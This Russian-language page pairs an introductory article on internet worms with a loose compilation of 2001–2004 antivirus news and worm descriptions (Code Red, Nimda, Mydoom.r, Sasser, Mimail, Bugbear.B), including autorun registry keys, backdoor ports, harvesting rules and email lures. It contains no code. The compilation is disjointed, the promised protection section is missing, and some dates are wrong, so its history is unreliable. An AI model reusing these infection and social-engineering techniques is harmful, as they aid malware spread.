|
|||||||||||||
|
|||||||||||||
Интернет черви - основы основ.
Code Red, Code Red II, Klez - кто о них не слышал, а сколько от них пострадало кампаний и простых людей… Все это компьютерные черви. Цель этой статьи - объяснить, что такое интернет червь или компьютерный червь (разницы никакой) и показать способы защиты от них. Вперед!
Что такое компьютерный червь?
Компьютерный червь очень похож на компьютерный вирус, то есть это программа, которая сама себя копирует и часто, но не всегда, содержит некую функцию, которая вмешивается в нормальную работу компьютера.
Интернет червь - это саморазмножающаяся программа, которая не заражает (изменяет) файлы, а оседает в активной памяти и размножается, использую компьютерные сети.
Черви пользуются средствами операционных систем, что бы скрыть свое присутствие на компьютере от пользователя, и каждый раз загружаться без ведома юзеров. Обычно, компьютерных червей обнаруживают, когда их неконтролируемое размножение начинает потреблять много системных ресурсов, тормозя некоторые приложения или всю систему. Новый класс интернет червей, например, Worm.ExploreZip, также оседает в активной памяти и размножается через компьютерные сети, но он еще содержит некую опасную функцию.
В отличие от вирусов, черви распространяются, как отдельная программа; они не прикрепляют свое тело к другим файлам или программам. Компьютерный червь может распространяться сам (без помощи пользователя) через сеть - с одного компьютера, на следующий и т. д.
Интернет черви были так названы, потому что наносят гигантский вред и из-за того, что они распространяются самостоятельно, то есть пользователю не обязательно запускать какую-либо программу, чтобы активировать компьютерный червь.
Черви, которые ломали IIS и потрясли мир.
Code Red, Code Red II и Nimda буйствовали в сети с Июля по Октябрь 2001 года. 19 июля 2001 года, в течение девяти часов, вирус Code Red подорвал работу более 250,000 серверов. Некоторые сети просто прекратили свою работу, другие работали очень медленно. Множество маленьких интернет провайдеров вынуждены были прекратить свою работу на несколько часов или даже более того.
Вирус получил название 'Code Red', потому что он был открыт техническими служащими, которые пили новый напиток компании 'Mountain Dew', под названием Code Red.
Интернет 'червь' Code Red заражал компьютерные сервера, на которых использовалось программное обеспечение фирмы Microsoft, а точнее Microsoft's Internet Information Server (IIS), который входил в стандартную комплектацию новых версии WinNT. Около 6 миллионов веб серверов используют IIS. Когда червь заражал компьютерный сервер, он дефейсил главную страницу и помещал следующий текст: "Welcome to http://www.worm.com! Hacked by Chinese!". Также, зараженные сервера должны были послать 400 мегабайтовые пакеты информации на whitehouse.gov то есть провести DDoS атаку. Компьютеры Белого Дома спасло лишь то, что служащие вовремя сменили IP адреса серверов.
Code Red распространялся так: 1) Случайным образом выбирал 100 IP адресов 2) определял, стоит ли на этих компьютерах IIS 3) Заражал только те компьютеры, на которых присутствовал интернет сервер от Microsoft (тот самый IIS). Почему заражению подверглись компьютеры только с установленным IIS? Все очень просто - червь использовал недавно обнаруженную уязвимость в этом программном обеспечении. Похоже, что Code Red заражал только Англоязычные сервера.
За две недели до появления Code Red, Microsoft выпустила патч, закрывающий дыры, которые в последствии использует червь Code Red. Как водится, этот патч скачали не все, а точнее почти никто ;), за что и поплатились. Кстати, заплатка и сейчас доступна на сайте Microsoft (http://www.microsoft.com). Если бы все скачали этот патч, то 100%, что они не подвергли себя угрозе заражения.
Вслед за Code Red, появился и Code Red II - гораздо более деструктивный (разрушительный) вариант, который использовал те же самые уязвимости в IIS, что и Code Red, но содержал в себе еще и троян. Этот троян давал хакерам полный контроль над зараженной системой.
Затем, 11 сентября 2001 года появился червь из червей - NIMDA. Если бы этот червь производил какие-либо разрушительные действия, то ущерб, нанесенный им, был бы огромен!
"По сути, это настоящий коктейль из вируса, трояна и компьютерного червя", - сказал первый заместитель директора 'Internet Services'.
Nimda использовала уже обнаруженную дыру в Microsoft's Internet Information Server Web software (тоже самое, что Code Red и Code Red II). Когда Nimda попадает на компьютер, она первым делом пытается размножить себя тремя способами. 1) У этого червя есть свой собственный e-mail движок, то есть Nimda пытается разослать себя всем тем, кто находится в адресной книги Microsoft Outlook. 2) Червь занимается поиском IIS серверов и сканирует их на предмет существования уже найденных уязвимостей. 3) Nimda ищет расшаренные диски и пытается на них пробраться.
В конце концов, червь Nimda заразил порядка 8,3 миллиона компьютерных сетей. Причиненный ущерб оценивается в 590 миллионов долларов.
Как защититься от компьютерных червей?
2004
Вирус-червь, распространяющийся через интернет в виде файлов, прикрепленных к зараженным письмам, а также по сетям файлообмена Kazaa. Рассылается по всем найденным на зараженном компьютере адресам электронной почты.
Червь является приложением Windows (PE EXE-файл), имеет размер около 38КБ, упакован UPX. Размер распакованного файла около 74КБ.
Червь содержит в себе бэкдор-функцию.
Инсталляция
После своего запуска червь запускает Windows Notepad, в котором демонстрирует произвольный набор символов:
При инсталляции червь копирует себя с именем "tasker.exe" в системный каталог Windows и регистрирует этот файл в ключе автозагрузки системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "Task"="%System%\tasker.exe"
Червь создает в системном каталоге Windows файл "nemog.dll", являющийся бэкдор-компонентом и регистрирует этот файл в системном реестре:
[HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InprocServer32] "(Default)"="%System%\Nemog.dll"
Распространение через email
Для поиска адресов жертв червь сканирует адресные книги MS Windows, а также ищет адреса в файлах, имеющих следующие расширения:
adbh aspd dbxn htmb phpq pl shtl tbbg wab
При этом игнорируются адреса, содержащие следующие подстроки:
.edu .gov .mil abuse accoun acketst admin anyone arin. avp berkeley borlan bsd bugs ca certific contact example feste fido foo. fsf. gnu gold-certs google gov. help |
iana ibm.com icrosof icrosoft ietf info inpris isc.o isi.e kernel linux listserv math me mit.e mozilla mydomai no nobody nodomai noone not nothing ntivi page panda pgp |
postmaster privacy rating rfc-ed ripe. root ruslis samples secur sendmail service site soft somebody someone sopho submit support syma tanford.e the.bat unix usenet utgers.ed webmaster you your |
При рассылке зараженных писем червь пытается осуществить прямое подключение к SMTP-серверам.
Характеристики зараженных писем
Отправитель:
Имя отправителя выбирается из следующих вариантов:
adam alex alice andrew anna bill bob brenda brent brian claudia dan dave david debby fred |
george helen jack james jane jerry jim jimmy joe john jose julie kevin leo linda maria |
mary matt michael mike peter ray robert sam sandra serg smith stan steve ted tom |
Выбирается из списка:
Error hello hi Mail Delivery System Mail Transaction Failed Server Report Status test
Текст письма:
Используется один из предустановленных вариантов, например:
Выбирается из списка:
body data doc document file message readme test text
Вложения могут иметь одно из следующих расширений:
bat cmd doc exe htm pif scr tmp
Размножение через P2P
Червь проверяет наличие установленного на машине клиента Kazaa и копирует себя в каталог файлообмена под следующими именами:
Cleaner.exe Crack.exe Fixtool.exe Hotmail hacker.exe Mydoom.exe Netsky.exe ps2 emulator.exe SoBig.exe Upload.exe Vahos.exe Viraus.exe Wenrar.exe Winzip.exe xbox emulator.exe XXX Pictures.exe XXX Videos.exe yahoo hacker.exe
Удаленное администрирование
Червь открывает на зараженной машине TCP порт 5422 для приема команд. Функционал бэкдора позволяет злоумышленнику получить полный доступ к системе. Бэкдор может загружать из интернета и запускать на исполнение любые файлы.
Прочее
I-Worm.Mydoom.r содержит следующие строки:
MSG To SkyNet-Netsky: i know skynet is sucks so fuck off and i will
complete my projects ok baby!,the second author for mydoom worms!!, he
will complete the project, more is coming soon better than better,
Kuwait
Q: Как работает нашумевший ICQ-червь Worm.Win32.Bizex?
A: Он распространялся по icq, рассылая сообщение, уводящее на сайт со звуковой ICQ-схемой. Схема .scm, без спроса загрузившись в систему (из-за ошибки в пейджере), подменяет ряд звуковых файлов. Затем, через дырку в системе Help’a IE, запускает с системными правами код эксплойта. Зараза winupdate.exe загружается в автозагрузку и начинает рассылать рекламу сайта по аське. Более подробное описание есть на www.viruslist.com, securityresponse.symantec.com и www.trendmicro.com. Червь заставил почесаться любителей старых версий icq :).
Worm.Win32.Sasser.a/b
Опасность : средняя
Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows.
Ее описание приведено в Microsoft Security Bulletin MS04-011.
Червь написан на языке C/C++, с использованием компилятора Visual C.
Имеет размер ок. 15 Кб, упакован ZiPack.
Размножение:
При запуске червь регистрирует себя в ключе автозапуска системного реестра:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
avserve.exe = %WINDIR%\avserve.exe
Червь сканирует IP-адреса в поисках компьютеров, подверженных уязвимости MS04-011. Уязвимый компьютер на TCP-порту 9996 запускает командную оболочку "cmd.exe" и принимает команду на загрузку и запуск копии червя.
Загрузка выполняется по протоколу FTP.
Для этого червь запускает FTP-сервер на TCP-порту 5554 и по запросу с уязвимого компьютера загружает туда свою копию. Загруженная копия имеет имя "_up.exe", где N - случайное число.
14 апреля 2004 года Bugbear.C
24.02.04 ICQ-червь
Очередная зараза, использующая при распространении известную уже два года дырку в ICQ, позволяющую под видом звуковой схемы закачать на атакуемую машину произвольный файл. В данном случае жертве заливается chm-файл, из которого через дырку в реализации штатной IE-шной функции showHelp уже с локального диска запускается скрипт, выполняющий основную черную работу. Пользователи альтернативных клиентов, как обычно, могут спать спокойно.
P.S. Hе ходите по ссылкам.
20.02.2004 NetSky и NetSky.B
2003
Червь Slammer: как он устроен, и как с ним бороться Как уже сообщала "Компьюлента", 25 января 2002 года интернет был частично парализован из-за нового вируса Slammer (также известного под именем Helkern).
|
25.02.2003 Новый червь Lovegate
Антивирусные компании сообщают о появлении нового вируса - Lovegate. Он распространяется с помощью электронной почты и через сетевые папки. Свои копии вирус помещает в исполняемых файлах с именами docs.exe, pics.exe, fun.exe, setup.exe, joke.exe и некоторыми другими.
Для распространения по электронной почте червь использует следующий трюк: свои копии он направляет в виде ответов на входящие письма. По замыслу автора вируса, получатель с большей вероятностью запустит вложенный файл, если тот будет прилагаться к ответу на его письмо.
Кроме этого, Lovegate сканирует все HTML-файлы, имеющиеся в папках Windows, My Documents и текущей папке, извлекая из них адреса электронной почты. По всем найденным адресам вирус рассылает свои копии. Вложенный файл маскируется под архив с документами, shareware-программы, утилиты для взлома или ROM-файлы для эмуляторов игровых приставок и т.д.
После активации вирус открывает для своих авторов черный ход в систему через порт 10168. Извещение об успешном заражении направляется на один из почтовых адресов [email protected] или [email protected], которые принадлежат китайским провайдерам.
По информации Trend Micro наибольшее распространение вирус получил на Тайване, в Японии, Австралии, во Франции и других странах. В США масштабы распространения Lovegate заметно меньше. В целом, опасность червя оценивается как средняя, но пользователям стоит быть начеку
Появились первые сообщения об обнаружении червя Deloder (W32/Deloder.A). Эта программ создана в Китае и приживается на машинах, работающих под управлением операционных систем Win2: и XP. Для распространения данный вредоносный код ищет в сети Интернет компьютеры, с которыми он может соединиться через порт 445. При успешной установке соединения червь копирует в папку Windows файл INST.EXE. Этот файл является троянцем, предназначенным для получения удаленного доступа к компьютеру. После этого Deloder создает свою копию на зараженном компьютере в файле DVLDR32.EXE. Кроме того, Deloder пытается обнаружить имена пользователей, подключенных к той же сети, что и зараженный компьютер. Найдя их, червь пытается получить доступ к компьютерам путем подбора пароля к системе из списка наиболее часто используемых слов и выражений. Наконец, Deloder отключает общие сетевые ресурсы и вносит некоторые записи в системный реестр Windows для обеспечения постоянной работы на зараженном компьютере
На втором месте обосновался I-Worm.Sobig, его выбрали 10.75% пользователей. I-Worm.Sobig известен своим пристрастием к созданию видеоэффектов на Рабочем столе. Третью ступень пьедестала почета занял I-Worm.Lentin, который уступил серебрянному призеру немногим больше одного процента. Он очень не любит антивирусные программы и пытается принудительно завершить их работу.
По 7-м и 24-м числам червь запускает процедуру, которая случайно перемещает курсор мыши и открывает веб-страницу .
Win95.CIH (Чернобыль), который заражает только машины с системами Win95/98 оказался на 10месте, видимо народ потихоньку мигрирует на систему WinXP с которой у этой программы отношения не сложились.
Кроме того, черви отправляют большое количество электронных сообщений, содержащих зараженные файлы, всем адресатам, письма от которых находятся в папке Inbox зараженного компьютера, а также по всем иным адресам, найденным на зараженном компьютере.
Lovgate.F и Lovgate.G написаны на языке visual C++ и упакованы с помощью ASpack. Различие между версиями 'G' и 'F' заключается в имени флага, создаваемого ими для индикации своего присутвия в памяти компьютера.
23/04/2003 По сети гуляет червяк по имени VBS/Lisa. Распространяется он по каналам IRC, а также прыгает с машины на машину через общие сетевые диски. Разумеется, что классический способ доставки посредством электронной почты, этот червь тоже небезуспешно использует. Правда, если вы не в ладах с английским, то особенно бояться вам нечего, поскольку письмо с темой "Click YES and vote against war!" вы удалите практически наверняка. А вот если у вас все же возникнет подсознательное желание сказать "Да", то соберите в кулак всю свою волю и просто промолчите. Кстати, согласно народной мудрости именно так и следует казаться умным человеком.
Ну а если любопытство окажется сильней рассудка, то червь создаст более 5000 папок в корневом каталоге жесткого диска и копии текстового файла, содержащего строку "I will never stop loving you" в каждой папке.
Также VBS/Lisa записывает несколько команд в файл Autoexec.bat для форматирования диска C:\ и перезагружает компьютер. Также этот червь уничтожает файл Regedit.exe и, если после заражения прошло от трех дней и более, VBS/Lisa удаляет следующие файлы: user.dat, user.bak, system.dat, system.bak и win.com. Наконец, VBS/Lisa отключает все ярлыки, находящиеся на рабочем столе, и, для усложнения работы антивирусной программы, вставляет специальные символы в их коды.
29.04.2003 Компания Symantec предупреждает о появлении нового червя. способного шпионить за пользователями компьютеров. Червь, названный W32.HLLW.Kullan, копирует себя в системную папку Windows и, будучи активированным, заражает все компьютеры, доступные в сетевом окружении. Червь содержит целый ряд backdoor-функций: умеет проверять почту, записывать информацию, вводимую с клавиатуры и собирать информацию о конфигурации компьютера и операционной системе.
07 мая 2003 года Сам себе сервер
В сети обнаружена активность червя Nolor (WW2/Nolor). Nolor - это червь, распространяющийся по электронной почте. После заражения компьютера он рассылает свои копии с помощью собственного SMTP механизма по всем адресам, хранящимся в адресной книге компьютера. Сообщение, содержащее Nolor, очень сильно меняется, но всегда оно связано с фотографиями Бин Ладена, поздравительными открытками или паролями для каких-либо программ. Тем не менее, Nolor достаточно легко опознать, так как сообщение всегда содержит одиниз следующих вложенных файлов: LOVE_LORN.KIS.OK.EXE, LOVELORN.KIS.OK.EXE,
THUYQUYEN.KIS.OK.EXE, LOVE_LORN.HTM, LOVELORN.HTM или THUYQUYEN.HTM.
11.05.2003 Апрельская двадцатка
"Лаборатория Касперского" опубликовала список наиболее активных вредоносных программ за апрель текущего года. Первое место досталось червю Klez - на его долю пришлось более 20% всех случаев заражения, на втором месте - Lentin с 18%, третью позицию занимает червь Ganda - его "счет" составляет всего лишь 0,76%.В целом же, список активных вирусов и червей выглядит так:
1. I-Worm.Klez - 20,11%
2. I-Worm.Lentin - 17,91%
3. I-Worm.Ganda - 0,76%
4. Trojan.PSW.M2 - 0,69%
5. Win95.CIH - 0,67%
6. Macro.Word97.Thus - 0,56%
7. Troyan.PSW.MiniLD - 0,56%
8. PS-MPS-based - 0,52%
9. Backdoor.IRC.Zcrew - 0,47%
10. Macro.Word97.VMPC-based - 0,47%
11. Mnemonix.Oracle - 0,47%
12. I-Worm.LovGate - 0,44%
13. BW-based - 0,43%
14. Win95.Spaces - 0,41%
15. Win32.HLLP.Hantaner - 0,40%
16. I-Worm.Tanatos - 0,39%
17. BackDoor.SubSeven - 0,38%
18. Backdoor.SdBot.gen - 0,37%
19. I-Worm.Sobig - 0,32%
20. VBS.Redlof - 0,31%
На долю других вредоносных программ пришлось более половины всех заражений - 53,35%.
14 мая 2003 года В сети обнаружена активность червя Kickin, который написан на Microsoft Visual C 6.00. Эта зараза очищает память компьютера от ряда процессов (связанных с антивирусными и иными программами для обеспечения информационной безопасности) и прерывает те из них, которые активны на данный момент.
Червь Kickin распространяется по электронной почте, используя свой собственный SMTP механизм, а также по каналам IRC и через P2P приложения. W32/Kickin заражает системы Win9x, NT, 2000 и XP. Сообщения W32/Kickin пытаются обмануть пользователей, заставляя их думать, что зараженные файлы на самом деле связаны с атипичной пневмонией, модулями обновлений, любовными письмами, играми, фотографиями и т.п. W32/Kickin создает файл script.ini, содержащий код червя и позволяющий ему распространяться посредством mIRC. Также он копирует себя в общие папки P2P программ (KaZaA, Bearhsare, Edonkey2000 и Morpheus)
20 мая 2003 года "Лаборатория Касперского" сообщает о появлении нового сетевого червя Palyh, который маскируется под сообщение от службы технической поддержки Microsoft. Распространяется вирус посредством электронной почты и через локальные сети и на данный момент уже зарегистрировано большое количество случаев заражения. При установке Palyh копирует себя под именем "MSCCN32.EXE" в каталог Windows и регистрирует этот файл в ключе автозапуска системного реестра. Таким образом, червь обеспечивает свою загрузку в память компьютера при запуске операционной системы.
После этого червь начинает процедуры распространения. Для рассылки по электронной почте он сканирует файлы с расширениями .TXT, .EML, .HTML, .HTM, .DBX, .WAB и выделяет из них строки, похожие на электронные адреса. Затем Palyh в обход установленной почтовой программы подключается к используемому SMTP-серверу и рассылает через него на эти адреса свои копии.
В качестве обратного адреса зараженное письмо использует адрес [email protected], что и вводит в заблуждение некоторых неопытных или просто по жизни безалаберных пользователей. Разумеется, что к этому письму Microsoft никакого отношения не имеет, поскольку рассылкой патчей не занимается вообще.
9.08.2003 Вирус Mimail: из России с любовью
По Сети распространяется новый червь под кодовым названием Mimail, сообщили сегодня представители «Лаборатории Касперского». Круглосуточная служба технической поддержки компании уже получила сообщения о многочисленных случаях заражения данной вредоносной программой. С определенной степенью уверенности можно говорить, что Mimail - дело рук российских вирусописателей, утверждают в «Лаборатории Касперского». Червь использует технологии и реализацию, практически идентичные примененным в троянской программе StartPage, которая однозначно имеет российское происхождение.
Mimail является интернет-червем, распространяющимся во вложенных файлах электронных писем. Зараженные письма содержат фальсифицированный адрес отправителя (что затрудняет поиск источника заражения) и выглядят следующим образом:
Тема: your account [rnd]
(где [rnd] - переменная величина, принимающая любые значения)
Текст:
Hello there,
I would like to inform you about important information regarding your email address. This email address will be expiring.
Please read attachment for details.
---
Best regards, Administrator
---
Вложенный файл: message.zip
Подобно нашумевшим червям Klez и Lentin (Yaha), Mimail проникает на компьютеры, используя “дыры” в системе безопасности браузера Internet Explorer. Во вложенном архиве MESSAGE.ZIP содержится файл MESSAGE.HTML. В случае, если пользователь имел неосторожность открыть его, встроенный Java-скрипт через брешь Exploit.SelfExecHTML незаметно записывает на диск и запускает файл-носитель червя FOO.EXE. В свою очередь, он копирует себя в директорию Windows под именем VIDEODRV.EXE и регистрирует этот файл в секции автозапуска системного реестра Windows для обеспечения запуска червя при каждой загрузке операционной системы. Mimail также создает ряд дополнительных файлов в директории Windows: EXE.TMP - червь в файле формате HTML; ZIP.TMP - червь в ZIP-архиве.
Для дальнейшего распространения по почте Mimail сканирует отдельные директории на локальном диске и извлекает из них строки, содержащие электронные адреса. Собранные данные записываются в файл EML.TMP в директории Windows, после чего червь, используя прямое подключение к почтовому серверу, незаметно рассылает по обнаруженным адресам свои копии.
Брешь Exploit.SelfExecHTML была обнаружена еще в марте 2002 г., и компания Microsoft еще тогда выпустила специальное обновление для Internet Explorer.Mimail, по большому счету, безобидная программа с точки зрения побочных эффектов. Ее опасность заключается в популяризации описанной бреши Internet Explorer.
15.11.2004 За 24 часа Fizzer поразил 17, 765 компьютеров.
Новый компьютерный червь Fizzer (мы сообщали о его появлении вчера), который распространяется не только через электронную почту, но и посредством пиринговых сетей уже поразил десятки тысяч компьютеров в странах Азии, Европы и в США. Бизнесмены азиатских стран первыми забили тревогу о появлении нового вируса,. cообщает Reuters. К полудню того же дня вирус уже добрался до европейских пользователей поразив десятки тысяч компьютерных систем. В Северной Америке вирус еще не успел получить широкое распространение, поскольку его проникновение в регион пришлось на конец рабочего дня. Британская анти- вирусная компания MessageLabs зарегистрировала в течении 24 часов 17, 765 случаев заражения вирусом Fizzer. «Быстрые темпы распространения червя заставляют нас отнести его к группе вирусов, предстовляющих высоких риск для обычных пользователей, - рассказал в интервью Reuters Макр Тошак, один из аналитиков MessageLabs.
Двадцатка вирей за май.
"Лаборатория Касперского" опубликовала двадцатку вредоносных программ, получивших в мае наибольшее распространение. Вирус Klez, не один месяц прочно державшийся на первом месте, на этот раз скатился на третье. Первую же строчку, по статистике антивирусной компании, занимает вирус I-Worm.Sobig. На его долю приходится 21,87% зафиксированных заражений, и отрыв от ближайшего конкурента составляет почти 6 процентов.
I-Worm.Sobig - 21,87%
I-Worm.Lentin - 15,95%
I-Worm.Klez - 15,39%
I-Worm.Fizzer - 0,67%
I-Worm.Roron - 0,51%
Worm.Win32.Randon - 0,38%
I-Worm.Ganda - 0,28%
Macro.Word97.Thus - 0,28%
Backdoor.Assasin - 0,24%
I-Worm.Tanatos - 0,21%
Backdoor.Optix - 0,20%
Backdoor.IRC.Zcrew - 0,19%
Win32.Parite - 0,17%
Win32.FunLove - 0,17%
Backdoor.IRC.Flood - 0,16%
TrojanDropper.JS.Mimail - 0,16%
VBS.Redlof - 0,15%
Backdoor.IRC.mIRC-based - 0,14%
Backdoor.SdBot.gen - 0,12%
TrojanDownloader.Win32.Swizzor - 0,12%
Вирусная десятка мая в версии Panda Software
По итогам проверок, проводимых по всему миру бесплатным онлайновым антивирусом Panda ActiveScan, в мае червь Klez.I по-прежнему возглавлял вирусную десятку и стал причиной более 8 % зафиксированных заражений. Сразу за ним следует Enerkaz - он был обнаружен более чем в 4% случаев. Другими вирусами, чаще других атакующими компьютеры пользователей в мае, стали червь Parite.B (около 4%) и троянец NoClose (более 3 %). Недавно появившийся червь Sobig.B находится на пятом месте. Несмотря на свою молодость, это червь стал причиной большого количества вирусных инцидентов - на его совести около 3 % вирусных атак мая.
Вторая половина вирусной десятки - старые знакомцы, уже несколько месяцев отказывающиеся покидать места в первой десятке - Elkern.C, Opaserv, Nimda, Bugbear и Redlof.A.
Таким образом, два момента обращают на себя внимание: во-первых, в мае Klez.I сохранял свои позиции, что может быть объяснено исключительным по своим возможностям методом распространения, и, во-вторых, очень эффектный старт червя Sobig.B. Тот факт, что наиболее активные вирусы мая появились на сцене несколько месяцев назад, подтверждает мысль о необходимости более ответственного подхода к антивирусной защите компьютера. Луис Корронс (Luis Corrons), глава Вирусной Лаборатории Panda Software, утверждает: "Для того, чтобы быть полностью защищенными от вредоносных кодов, пользователи должны устанавливать антивирусную программу с обязательными ежедневными обновлениями. В противном случае,вероятность быть зараженным чрезвычайно высока. И речь не только о самых свежих вирусах, но и о тысячах других вредоносных кодов, циркулирующих по сети в настоящее время".
04 июня 2003 года
Скорость, с которой червь Sobig.C распространяется по миру, позволяет говорить о возможном начале новой эпидемии. Действительно, Sobig.C уже сейчас входит в десятку наиболее распространенных вирусов, которая составляется по итогам работы бесплатного онлайнового антивируса Panda ActiveScan.
Причем, следует отметить, что Sobig.C расширяет географию своего распространения. Согласно данным, поступающим в Службу международной технической поддержки, инциденты с этим червем зафиксированы в Канаде, Испании, Великобритании и США. В качестве средств распространения Sobig.C использует электронную почту и локальные сети. Письмо с этим червем легко распознать, поскольку оно всегда содержит текст 'Please see the attached file'. Название прикрепленного файла может варьироваться.
Заразив компьютер, Sobig.C рассылает себя по всем адресам электронной почты, которые он находит в файлах с расширениями .txt, .eml, .htm, .html, .dbx и .wab. Panda Software советует всем пользователям быть предельно внимательными при получении почты, а также немедленно обновить свои антивирусные программы тем, у кого они не настроены на автоматическое обновление.
В связи c увеличивающейся угрозой заражения этим червем компания Panda Software выпустила бесплатную утилиту PQRemove, которая поможет пользователям, успевшим пострадать от этого червя, вылечить свои системы.
06/06/2003 За 1,5 часа вирус Bugbear B заразил 25000 компьютеров по всему миру
В 2002 году вирус Bugbear был одним из самых опасных вирусов. Новый вариант вируса Bugbear B, содержит множество мелких программ, которые помогают вирусу распространяться, похищать конфиденциальную информацию, прятаться и отключать программы следящие за безопасностью. Инфицирование происходит через электронную почту. В теме сообщения, содержащего вирус, может присутствовать следующий текст:
Что бы придать себе правдоподобие вирус использует одно из названий документов содержащихся на компьютере-источнике, однако у файла присутствует двойное расширение, например «имя файла».doc.exe, что позволяет его легко идентифицировать опытному пользователю. Когда вирус проникает в компьютер, он ищет адреса для рассылки, а также случайным образом подбирает адрес, который будут указан в сообщении как адрес отправителя "from".
Вирус самостоятельно копируется на жесткие диски и в папки, находящиеся в свободном доступе в сетевом окружении. Иногда это приводит к тому, что сетевой принтер печатает страницу за страницей абракадабры.
Bugbear B также пытается установить программу, фиксирующую все нажатия на клавиатуре компьютера. Это позволяет отслеживать все набираемые тексты и в том числе вводимые пароли. В определенный момент, вирус открывает «черный ход» в Интернет так, что бы создатель вируса получил контроль над зараженным компьютером. Замечено, что путешествуя от компьютера к компьютеру вирус может трансформироваться, что бы избежать обнаружения антивирусными программами по свойственным ему подписям или участкам кода.
10 июня 2003 года В сети обнаружена новая модификация червя I-Worm.Tanatos.b в диком виде. Червь не сильно отличается от своего предшественника по функциональным возможностям. Фактически он представляет собой шифрованный и слегка модифицированный вариант предыдущей версии: I-Worm.Tanatos. Червь распространяется по электронной почте в виде прикреплённых к письмам файлов.
Письмо также содержит HTML-страницу, содержащую скрипт, автоматически активизирующий тело червя при просмотре письма через уязвимость IFRAME. При запуске червь делает свою копию в папку автозапуска программ и в папку Windows. Далее он ищет адреса электронной почты, перебирая файлы, подходящие под маски: *.ods, .inbox*, *.mmf, *.nch, *.mbx, *.eml, *.tbb, *.dbx.
Правда, при отправке инфицированных писем червь иногда совершает ошибку, из-за чего конечному пользователю приходит повреждённое тело червя, которое не может нанести вреда.
17 Июнь 2003 Новый разрушительный вирус/червь Trile
Вирусная Лаборатория компании Panda Software обнаружила появление нового червя Trile (W32/Trile). Этот вредоносный код способен заражать файлы, а также использовать методы «социального инжиниринга» для широкого распространения. Trile попадает на компьютеры в электронном сообщении с варьирующимися параметрами, выбирая тему, текст сообщения и т.п. из имеющегося списка. Вложения всегда имеют двойное расширение, одним из которых является .bat или .pif, а другим может быть одно из следующих: .gif, .mpg, .mp3, .xls, .wav, .dat, .jpg, .htm, .txt, .mdb, .bmp или .doc. При открытии такого файла Trile рассылает себя по всем адресам из Адресной книги Outlook. Кроме того, он создает папку “C:/My Downloads”, если таковой не существует. В этой папке червь создает большое количество своих копий с завлекательными именами, такими как: Civilization 3 Full Downloader.exe, Need For Speed 5 Porsche Unleashed Patch.exe или Star Wars Starfighter ISO - Full Downloader.exe. Кроме того, Trile заражает файлы с расширением .EXE. Наконец, он создает ряд записей в Реестре Windows, имеющих отношение к действиям червя на зараженном компьютере, например, сколько сообщений он разослал.
04.07.2003 Рейтинг распространения вирусов в июне
"Лаборатория Касперского" опубликовала очередной ежемесячный отчёт, отражающий текущую динамику попыток заражений тем или иным видом вирусных программ.
Рейтинг распространения вирусов в июне 2003 г.
Поз. | Название | Доля |
---|---|---|
1 | I-Worm.Lentin | 32.48% |
2 | I-Worm.Klez | 17.69% |
3 | I-Worm.Tanatos | 16.91% |
4 | I-Worm.Sobig | 12.01% |
5 | Macro.Word97.Saver | 1.17% |
6 | Macro.Word97.Thus | 1.00% |
7 | VBS.Redlof | 0.73% |
8 | I-Worm.Ganda | 0.53% |
9 | Backdoor.Beastdoor | 0.31% |
10 | Win95.CIH | 0.29% |
11 | Backdoor.Assasin | 0.28% |
12 | Backdoor.Optix | 0.22% |
13 | Backdoor.SdBot.gen | 0.21% |
14 | I-Worm Hybris | 0.20% |
15 | Win32.Parite | 0.20% |
16 | I-Worm.Avron | 0.20% |
17 | I-Worm Hawawi | 0.15% |
18 | Backdoor.Death | 0.15% |
19 | I-Worm.Mapson | 0.14% |
20 | Backdoor.IRC.Zcrew | 0.14% |
Остальные | 53.35% |
Как видим, резко подскочила степень заражения вирусом I-Worm.Tanatos (третье место в списке), а вот прошлый лидер - I-Worm.Sobig - оказался на четвёртой позиции. Всего первые четыре вируса привели к почти 80% атак из числа первых двадцати вирусов (или к почти 37% всех зарегистрированных заражений)!
19 Июль 2003 Итоги вирусной активности за первую половину 2003 года
Комапания Panda Software подвела итоги вирусной активности первой половины 2003г. Первое полугодие 2003 года можно охарактеризовать как переходный период: наблюдаемый процесс эволюции компьютерных вирусов показывает направление их дальнейшего развития. Первое важное событие этого полугодия – появление вируса SQL Slammer. Он представляет собой новое поколение вредоносных кодов, распространяющихся непосредственно в сети Интернет и использующих дыры в программном обеспечении (в данном случае в SQL серверах). Следует признать, что SQL Slammer изрядно потрепал нервы пользователям из-за большого количества пораженных им серверов. Список вирусов, наиболее часто обнаруживаемых бесплатным онлайновым антивирусом Panda ActiveScan, в течение первых пяти месяцев возглавлял почтовый червь Klez.I. В начале июня на сцене появляется червь/троян Bugbear.B, который выбил из седла Klez.I. и занял место лидера. Эпидемия Bugbear.B позволяет говорить о другой тенденции: хотя в центре внимания по-прежнему остаются почтовые черви, использующие методы социального инжиниринга и дыры в программном обеспечении, значительную долю в общем числе заражений теперь составляют вирусы нового типа – гибриды червя и трояна. Вирусы нового типа, как следует из названия, объединяют в себе характеристики обоих типов вредоносных кодов, благодаря чему становятся вдвойне опаснее каждой из названных групп по отдельности. В частности, от троянов им досталась способность открывать доступ к компьютеру пользователя или воровать конфиденциальную информацию, например, базы данных клиентов, номера банковских счетов, кредитных карточек и т.д.
17.07.2003 Опасный вирус маскируется под обновление для Windows
Компания Symantec предупреждает о появлении крайне опасного червя W32.Gruel@mm. Ситуацию спасает только то, что он пока мало распространен. Червь распространяется по электронной почте и в пиринговой сети Kazaa. В первом случае он маскируется под критическое обновление для ОС Windows, а во втором - под генератор ключей для WinXP. На деле же при запуске происходит совсем иное: червь удаляет системные файлы Windows, обеспечивает свой запуск при запуске других программ, а также демонстрирует фальшивое сообщение об ошибке, при попытке закрыть которое открывается множество окон панели управления, исчезает панель задач, скрывается значок диска С:, и выполняются другие малоприятные действия.
22 июля 2003 года Klys
Компания Panda Software предупреждает о появлении нового червя Klys. Он распространяется через чаты IRC, сетевые папки и диски. После активации червь отключает доступ к большинству совместно использующихся сетевых ресурсов и открывает ряд портов, через которые на компьютер может проникнуть хакер. Помимо этого, Klys заносит на компьютеры другого червя под названием Cult. Klys устанавливается в систему в виде нескольких файлов, каждый из которых выполняет собственные функции. Для обеспечения своего запуска при старте Windows червь модифицирует системный реестр.
